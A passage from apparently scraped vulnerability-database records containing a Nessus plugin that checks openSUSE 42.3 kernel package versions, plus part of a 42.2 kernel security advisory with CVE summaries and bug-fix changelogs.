PM_BRU_CMPL in\n Power9 event list (bsc#1056686, fate#321438,\n bsc#1047238, git-fixes 34922527a2bc).\n\n - powerpc/perf: Factor out PPMU_ONLY_COUNT_RUN check code\n from power8 (fate#321438, bsc#1053043, git-fixes\n efe881afdd999).\n\n - powerpc/pseries: Fix parent_dn reference leak in\n add_dt_node() (bnc#1012382).\n\n - qlge: avoid memcpy buffer overflow (bnc#1012382).\n\n - rdma/bnxt_re: Allocate multiple notification queues\n (bsc#1037579).\n\n - rdma/bnxt_re: Implement the alloc/get_hw_stats callback\n (bsc#1037579).\n\n - Revert 'net: fix percpu memory leaks' (bnc#1012382).\n\n - Revert 'net: phy: Correctly process PHY_HALTED in\n phy_stop_machine()' (bnc#1012382).\n\n - Revert 'net: use lib/percpu_counter API for\n fragmentation mem accounting' (bnc#1012382).\n\n - Revert 'Update\n patches.fixes/xfs-refactor-log-record-unpack-and-data-pr\n ocessing.patch (bsc#1043598, bsc#1036215).' \n\n - Revert 'xfs: detect and handle invalid iclog size set by\n mkfs (bsc#1043598).'\n\n - Revert 'xfs: detect and trim torn writes during log\n recovery (bsc#1036215).' 
\n\n - Revert 'xfs: refactor and open code log record crc check\n (bsc#1036215).'\n\n - Revert 'xfs: refactor log record start detection into a\n new helper (bsc#1036215).'\n\n - Revert 'xfs: return start block of first bad log record\n during recovery (bsc#1036215).'\n\n - Revert 'xfs: support a crc verification only log record\n pass (bsc#1036215).'\n\n - scsi: ILLEGAL REQUEST + ASC==27 => target failure\n (bsc#1059465).\n\n - scsi: megaraid_sas: Check valid aen class range to avoid\n kernel panic (bnc#1012382).\n\n - scsi: megaraid_sas: Return pended IOCTLs with cmd_status\n MFI_STAT_WRONG_STATE in case adapter is dead\n (bnc#1012382).\n\n - scsi: sg: factor out sg_fill_request_table()\n (bnc#1012382).\n\n - scsi: sg: fixup infoleak when using SG_GET_REQUEST_TABLE\n (bnc#1012382).\n\n - scsi: sg: off by one in sg_ioctl() (bnc#1012382).\n\n - scsi: sg: remove 'save_scat_len' (bnc#1012382).\n\n - scsi: sg: use standard lists for sg_requests\n (bnc#1012382).\n\n - scsi: storvsc: fix memory leak on ring buffer busy\n (bnc#1012382).\n\n - scsi_transport_fc: Also check for NOTPRESENT in\n fc_remote_port_add() (bsc#1037890).\n\n - scsi: zfcp: add handling for FCP_RESID_OVER to the fcp\n ingress path (bnc#1012382).\n\n - scsi: zfcp: fix capping of unsuccessful GPN_FT SAN\n response trace records (bnc#1012382).\n\n - scsi: zfcp: fix missing trace records for early returns\n in TMF eh handlers (bnc#1012382).\n\n - scsi: zfcp: fix passing fsf_req to SCSI trace on TMF to\n correlate with HBA (bnc#1012382).\n\n - scsi: zfcp: fix payload with full FCP_RSP IU in SCSI\n trace records (bnc#1012382).\n\n - scsi: zfcp: fix queuecommand for scsi_eh commands when\n DIX enabled (bnc#1012382).\n\n - scsi: zfcp: trace HBA FSF response by default on dismiss\n or timedout late response (bnc#1012382).\n\n - scsi: zfcp: trace high part of 'new' 64 bit SCSI LUN\n (bnc#1012382).\n\n - seccomp: fix the usage of get/put_seccomp_filter() in\n seccomp_get_filter() (bnc#1012382).\n\n - skd: Avoid 
that module unloading triggers a\n use-after-free (bnc#1012382).\n\n - skd: Submit requests to firmware before triggering the\n doorbell (bnc#1012382).\n\n - smb3: Do not ignore O_SYNC/O_DSYNC and O_DIRECT flags\n (bnc#1012382).\n\n - smb: Validate negotiate (to protect against downgrade)\n even if signing off (bnc#1012382).\n\n - swiotlb-xen: implement xen_swiotlb_dma_mmap callback\n (bnc#1012382).\n\n - timer/sysclt: Restrict timer migration sysctl values to\n 0 and 1 (bnc#1012382).\n\n - tracing: Apply trace_clock changes to instance max\n buffer (bnc#1012382).\n\n - tracing: Erase irqsoff trace with empty write\n (bnc#1012382).\n\n - tracing: Fix trace_pipe behavior for instance traces\n (bnc#1012382).\n\n - tty: fix __tty_insert_flip_char regression\n (bnc#1012382).\n\n - tty: improve tty_insert_flip_char() fast path\n (bnc#1012382).\n\n - tty: improve tty_insert_flip_char() slow path\n (bnc#1012382).\n\n - Update\n patches.drivers/0029-perf-xgene-Remove-bogus-IS_ERR-chec\n k.patch (bsc#1036737).\n\n - vfs: Return -ENXIO for negative SEEK_HOLE / SEEK_DATA\n offsets (bnc#1012382).\n\n - video: fbdev: aty: do not leak uninitialized padding in\n clk to userspace (bnc#1012382).\n\n - Workaround for kABI compatibility with DP-MST patches\n (bsc#1055493).\n\n - x86/cpu/amd: Hide unused legacy_fixup_core_id() function\n (bsc#1060229).\n\n - x86/cpu/amd: Limit cpu_core_id fixup to families older\n than F17h (bsc#1060229).\n\n - x86/fpu: Do not let userspace set bogus xcomp_bv\n (bnc#1012382).\n\n - x86/fsgsbase/64: Report FSBASE and GSBASE correctly in\n core dumps (bnc#1012382).\n\n - x86/ldt: Fix off by one in get_segment_base()\n (bsc#1061872).\n\n - x86/mm: Fix boot crash caused by incorrect loop count\n calculation in sync_global_pgds() (bsc#1058512).\n\n - x86/mm: Fix fault error path using unsafe vma pointer\n (fate#321300).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1005778\"\n );\n 
script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1005780\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1005781\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1012382\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1022967\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1036215\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1036737\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1037579\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1037890\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1043598\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1044503\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1047238\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1051987\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1052593\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1053043\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1055493\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1055755\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1056686\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1057383\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1057498\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1058038\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1058410\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1058507\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1058512\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1058550\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1059051\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1059465\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1059500\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1060197\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1060229\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1061017\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1061046\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1061064\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1061067\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1061172\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1061831\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1061872\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected the Linux Kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-base\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-docs-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-docs-pdf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-macros\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-obs-build\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-obs-build-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-obs-qa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-source-vanilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-devel\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-debug-4.4.90-28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-debug-base-4.4.90-28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-debug-base-debuginfo-4.4.90-28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-debug-debuginfo-4.4.90-28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-debug-debugsource-4.4.90-28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-debug-devel-4.4.90-28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", 
reference:\"kernel-debug-devel-debuginfo-4.4.90-28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-default-4.4.90-28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-default-base-4.4.90-28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-default-base-debuginfo-4.4.90-28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-default-debuginfo-4.4.90-28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-default-debugsource-4.4.90-28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-default-devel-4.4.90-28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-devel-4.4.90-28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-docs-html-4.4.90-28.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-docs-pdf-4.4.90-28.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-macros-4.4.90-28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-obs-build-4.4.90-28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-obs-build-debugsource-4.4.90-28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-obs-qa-4.4.90-28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-source-4.4.90-28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-source-vanilla-4.4.90-28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-syms-4.4.90-28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-vanilla-4.4.90-28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-vanilla-base-4.4.90-28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-vanilla-base-debuginfo-4.4.90-28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-vanilla-debuginfo-4.4.90-28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", 
reference:\"kernel-vanilla-debugsource-4.4.90-28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kernel-vanilla-devel-4.4.90-28.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel-devel / kernel-macros / kernel-source / etc\");\n}\n", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-09-14T16:35:37", "description": "The openSUSE Leap 42.2 Kernel was updated to 4.4.90 to receive various\nsecurity and bugfixes.\n\nThe following security bugs were fixed :\n\n - CVE-2017-1000252: The KVM subsystem in the Linux kernel\n allowed guest OS users to cause a denial of service\n (assertion failure, and hypervisor hang or crash) via an\n out-of bounds guest_irq value, related to\n arch/x86/kvm/vmx.c and virt/kvm/eventfd.c (bnc#1058038).\n\n - CVE-2017-14489: The iscsi_if_rx function in\n drivers/scsi/scsi_transport_iscsi.c in the Linux kernel\n allowed local users to cause a denial of service (panic)\n by leveraging incorrect length validation (bnc#1059051).\n\n - CVE-2017-12153: A security flaw was discovered in the\n nl80211_set_rekey_data() function in\n net/wireless/nl80211.c in the Linux kernel This function\n did not check whether the required attributes are\n present in a Netlink request. 
This request can be issued\n by a user with the CAP_NET_ADMIN capability and may\n result in a NULL pointer dereference and system crash\n (bnc#1058410).\n\n - CVE-2017-12154: The prepare_vmcs02 function in\n arch/x86/kvm/vmx.c in the Linux kernel did not ensure\n that the 'CR8-load exiting' and 'CR8-store exiting' L0\n vmcs02 controls exist in cases where L1 omits the 'use\n TPR shadow' vmcs12 control, which allowed KVM L2 guest\n OS users to obtain read and write access to the hardware\n CR8 register (bnc#1058507).\n\nThe following non-security bugs were fixed :\n\n - arc: Re-enable MMU upon Machine Check exception\n (bnc#1012382).\n\n - arm64: fault: Route pte translation faults via\n do_translation_fault (bnc#1012382).\n\n - arm64: Make sure SPsel is always set (bnc#1012382).\n\n - arm: pxa: add the number of DMA requestor lines\n (bnc#1012382).\n\n - arm: pxa: fix the number of DMA requestor lines\n (bnc#1012382).\n\n - bcache: correct cache_dirty_target in\n __update_writeback_rate() (bnc#1012382).\n\n - bcache: Correct return value for sysfs attach errors\n (bnc#1012382).\n\n - bcache: do not subtract sectors_to_gc for bypassed IO\n (bnc#1012382).\n\n - bcache: fix bch_hprint crash and improve output\n (bnc#1012382).\n\n - bcache: fix for gc and write-back race (bnc#1012382).\n\n - bcache: Fix leak of bdev reference (bnc#1012382).\n\n - bcache: initialize dirty stripes in flash_dev_run()\n (bnc#1012382).\n\n - blacklist.conf: Add commit b5accbb0dfae\n\n - blacklist.conf: add one more\n\n - block: Relax a check in blk_start_queue() (bnc#1012382).\n\n - bsg-lib: do not free job in bsg_prepare_job\n (bnc#1012382).\n\n - btrfs: change how we decide to commit transactions\n during flushing (bsc#1060197).\n\n - btrfs: fix NULL pointer dereference from\n free_reloc_roots() (bnc#1012382).\n\n - btrfs: prevent to set invalid default subvolid\n (bnc#1012382).\n\n - btrfs: propagate error to btrfs_cmp_data_prepare caller\n (bnc#1012382).\n\n - btrfs: qgroup: move noisy 
underflow warning to debugging\n build (bsc#1055755).\n\n - cifs: Fix SMB3.1.1 guest authentication to Samba\n (bnc#1012382).\n\n - cifs: release auth_key.response for reconnect\n (bnc#1012382).\n\n - crypto: AF_ALG - remove SGL terminator indicator when\n chaining (bnc#1012382).\n\n - crypto: talitos - Do not provide setkey for non hmac\n hashing algs (bnc#1012382).\n\n - crypto: talitos - fix sha224 (bnc#1012382).\n\n - cxl: Fix driver use count (bnc#1012382).\n\n - dmaengine: mmp-pdma: add number of requestors\n (bnc#1012382).\n\n - drm: Add driver-private objects to atomic state\n (bsc#1055493).\n\n - drm/dp: Introduce MST topology state to track available\n link bandwidth (bsc#1055493).\n\n - ext4: fix incorrect quotaoff if the quota feature is\n enabled (bnc#1012382).\n\n - ext4: fix quota inconsistency during orphan cleanup for\n read-only mounts (bnc#1012382).\n\n - f2fs: check hot_data for roll-forward recovery\n (bnc#1012382).\n\n - fix xen_swiotlb_dma_mmap prototype (bnc#1012382).\n\n - ftrace: Fix memleak when unregistering dynamic ops when\n tracing disabled (bnc#1012382).\n\n - ftrace: Fix selftest goto location on error\n (bnc#1012382).\n\n - genirq: Fix for_each_action_of_desc() macro\n (bsc#1061064).\n\n - getcwd: Close race with d_move called by lustre\n (bsc#1052593).\n\n - gfs2: Fix debugfs glocks dump (bnc#1012382).\n\n - gianfar: Fix Tx flow control deactivation (bnc#1012382).\n\n - hid: usbhid: Add HID_QUIRK_NOGET for Aten CS-1758 KVM\n switch (bnc#1022967).\n\n - input: i8042 - add Gigabyte P57 to the keyboard reset\n table (bnc#1012382).\n\n - iommu/vt-d: Avoid calling virt_to_phys() on NULL pointer\n (bsc#1061067).\n\n - ipv6: accept 64k - 1 packet length in\n ip6_find_1stfragopt() (bnc#1012382).\n\n - ipv6: add rcu grace period before freeing fib6_node\n (bnc#1012382).\n\n - ipv6: fix memory leak with multiple tables during netns\n destruction (bnc#1012382).\n\n - ipv6: fix sparse warning on rt6i_node (bnc#1012382).\n\n - ipv6: fix typo 
in fib6_net_exit() (bnc#1012382).\n\n - kabi/severities: ignore nfs_pgio_data_destroy\n\n - keys: fix writing past end of user-supplied buffer in\n keyring_read() (bnc#1012382).\n\n - keys: prevent creating a different user's keyrings\n (bnc#1012382).\n\n - keys: prevent KEYCTL_READ on negative key (bnc#1012382).\n\n - kvm: async_pf: Fix #DF due to inject 'Page not Present'\n and 'Page Ready' exceptions simultaneously\n (bsc#1061017).\n\n - kvm: PPC: Book3S: Fix race and leak in\n kvm_vm_ioctl_create_spapr_tce() (bnc#1012382).\n\n - kvm: SVM: Add a missing 'break' statement (bsc#1061017).\n\n - kvm: VMX: do not change SN bit in vmx_update_pi_irte()\n (bsc#1061017).\n\n - kvm: VMX: remove WARN_ON_ONCE in\n kvm_vcpu_trigger_posted_interrupt (bsc#1061017).\n\n - kvm: VMX: use cmpxchg64 (bnc#1012382).\n\n - mac80211: flush hw_roc_start work before cancelling the\n ROC (bnc#1012382).\n\n - md/bitmap: disable bitmap_resize for file-backed bitmaps\n (bsc#1061172).\n\n - md/raid5: preserve STRIPE_ON_UNPLUG_LIST in\n break_stripe_batch_list (bnc#1012382).\n\n - md/raid5: release/flush io in raid5_do_work()\n (bnc#1012382).\n\n - media: uvcvideo: Prevent heap overflow when accessing\n mapped controls (bnc#1012382).\n\n - media: v4l2-compat-ioctl32: Fix timespec conversion\n (bnc#1012382).\n\n - mips: math-emu: <MAXA|MINA>.<D|S>: Fix cases of both\n infinite inputs (bnc#1012382).\n\n - mips: math-emu: <MAXA|MINA>.<D|S>: Fix cases of input\n values with opposite signs (bnc#1012382).\n\n - mips: math-emu: <MAX|MAXA|MIN|MINA>.<D|S>: Fix cases of\n both inputs zero (bnc#1012382).\n\n - mips: math-emu: <MAX|MAXA|MIN|MINA>.<D|S>: Fix quiet NaN\n propagation (bnc#1012382).\n\n - mips: math-emu: <MAX|MIN>.<D|S>: Fix cases of both\n inputs negative (bnc#1012382).\n\n - mips: math-emu: MINA.<D|S>: Fix some cases of infinity\n and zero inputs (bnc#1012382).\n\n - mm: prevent double decrease of nr_reserved_highatomic\n (bnc#1012382).\n\n - nfsd: Fix general protection fault in\n 
release_lock_stateid() (bnc#1012382).\n\n - pci: Allow PCI express root ports to find themselves\n (bsc#1061046).\n\n - pci: fix oops when try to find Root Port for a PCI\n device (bsc#1061046).\n\n - pci: Fix race condition with driver_override\n (bnc#1012382).\n\n - pci: shpchp: Enable bridge bus mastering if MSI is\n enabled (bnc#1012382).\n\n - perf/x86: Fix RDPMC vs. mm_struct tracking\n (bsc#1061831).\n\n - perf/x86: kABI Workaround for 'perf/x86: Fix RDPMC vs.\n mm_struct tracking' (bsc#1061831).\n\n - powerpc: Fix DAR reporting when alignment handler faults\n (bnc#1012382).\n\n - powerpc/pseries: Fix parent_dn reference leak in\n add_dt_node() (bnc#1012382).\n\n - qlge: avoid memcpy buffer overflow (bnc#1012382).\n\n - Revert 'net: fix percpu memory leaks' (bnc#1012382).\n\n - Revert 'net: phy: Correctly process PHY_HALTED in\n phy_stop_machine()' (bnc#1012382).\n\n - Revert 'net: use lib/percpu_counter API for\n fragmentation mem accounting' (bnc#1012382).\n\n - scsi: ILLEGAL REQUEST + ASC==27 => target failure\n (bsc#1059465).\n\n - scsi: megaraid_sas: Check valid aen class range to avoid\n kernel panic (bnc#1012382).\n\n - scsi: megaraid_sas: Return pended IOCTLs with cmd_status\n MFI_STAT_WRONG_STATE in case adapter is dead\n (bnc#1012382).\n\n - scsi: sg: factor out sg_fill_request_table()\n (bnc#1012382).\n\n - scsi: sg: fixup infoleak when using SG_GET_REQUEST_TABLE\n (bnc#1012382).\n\n - scsi: sg: off by one in sg_ioctl() (bnc#1012382).\n\n - scsi: sg: remove 'save_scat_len' (bnc#1012382).\n\n - scsi: sg: use standard lists for sg_requests\n (bnc#1012382).\n\n - scsi: storvsc: fix memory leak on ring buffer busy\n (bnc#1012382).\n\n - scsi: zfcp: add handling for FCP_RESID_OVER to the fcp\n ingress path (bnc#1012382).\n\n - scsi: zfcp: fix capping of unsuccessful GPN_FT SAN\n response trace records (bnc#1012382).\n\n - scsi: zfcp: fix missing trace records for early returns\n in TMF eh handlers (bnc#1012382).\n\n - scsi: zfcp: fix passing fsf_req to 
SCSI trace on TMF to\n correlate with HBA (bnc#1012382).\n\n - scsi: zfcp: fix payload with full FCP_RSP IU in SCSI\n trace records (bnc#1012382).\n\n - scsi: zfcp: fix queuecommand for scsi_eh commands when\n DIX enabled (bnc#1012382).\n\n - scsi: zfcp: trace HBA FSF response by default on dismiss\n or timedout late response (bnc#1012382).\n\n - scsi: zfcp: trace high part of 'new' 64 bit SCSI LUN\n (bnc#1012382).\n\n - seccomp: fix the usage of get/put_seccomp_filter() in\n seccomp_get_filter() (bnc#1012382).\n\n - skd: Avoid that module unloading triggers a\n use-after-free (bnc#1012382).\n\n - skd: Submit requests to firmware before triggering the\n doorbell (bnc#1012382).\n\n - smb3: Do not ignore O_SYNC/O_DSYNC and O_DIRECT flags\n (bnc#1012382).\n\n - smb: Validate negotiate (to protect against downgrade)\n even if signing off (bnc#1012382).\n\n - swiotlb-xen: implement xen_swiotlb_dma_mmap callback\n (bnc#1012382).\n\n - timer/sysclt: Restrict timer migration sysctl values to\n 0 and 1 (bnc#1012382).\n\n - tracing: Apply trace_clock changes to instance max\n buffer (bnc#1012382).\n\n - tracing: Erase irqsoff trace with empty write\n (bnc#1012382).\n\n - tracing: Fix trace_pipe behavior for instance traces\n (bnc#1012382).\n\n - tty: fix __tty_insert_flip_char regression\n (bnc#1012382).\n\n - tty: improve tty_insert_flip_char() fast path\n (bnc#1012382).\n\n - tty: improve tty_insert_flip_char() slow path\n (bnc#1012382).\n\n - vfs: Return -ENXIO for negative SEEK_HOLE / SEEK_DATA\n offsets (bnc#1012382).\n\n - video: fbdev: aty: do not leak uninitialized padding in\n clk to userspace (bnc#1012382).\n\n - Workaround for kABI compatibility with DP-MST patches\n (bsc#1055493).\n\n - x86/fpu: Do not let userspace set bogus xcomp_bv\n (bnc#1012382).\n\n - x86/fsgsbase/64: Report FSBASE and GSBASE correctly in\n core dumps (bnc#1012382).\n\n - x86/ldt: Fix off by one in get_segment_base()\n (bsc#1061872).\n\n - xfs/dmapi: fix incorrect 
